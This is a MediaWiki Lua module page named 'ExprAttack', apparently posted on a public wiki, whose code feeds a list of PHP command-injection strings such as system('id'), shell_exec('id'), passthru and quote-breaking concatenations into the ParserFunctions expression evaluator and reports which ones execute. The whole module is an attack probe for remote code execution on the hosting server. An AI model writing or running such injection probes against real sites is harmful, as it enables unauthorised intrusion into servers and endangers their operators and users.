模块:ExprAttack

来自希服维基

可在模块:ExprAttack/doc创建此模块的帮助文档 

local p = {}
function p.test()
    local pf = mw.ext.ParserFunctions
    if not pf or not pf.expr then return "no_expr" end

    local results = {}

    -- Try injecting system commands through expr
    local injections = {
        "system('id')",
        "eval('system', 'id')",
        "exec('id')",
        "shell_exec('id')",
        "passthru('id')",
        "popen('id', 'r')",
        "' . system('id') . '",
        "'+system('id')+'",
    }

    for _, inj in ipairs(injections) do
        local ok, ret = pcall(pf.expr, inj)
        local status = tostring(ok)
        if ok and ret then
            status = status .. ":" .. tostring(ret):sub(1,100)
        end
        results[#results+1] = inj:sub(1,30) .. "=" .. status
    end

    return table.concat(results, " | ")
end
return p
取自“https://xn--itt73r.xn--7wr.site/w/index.php?title=模块:ExprAttack&oldid=1015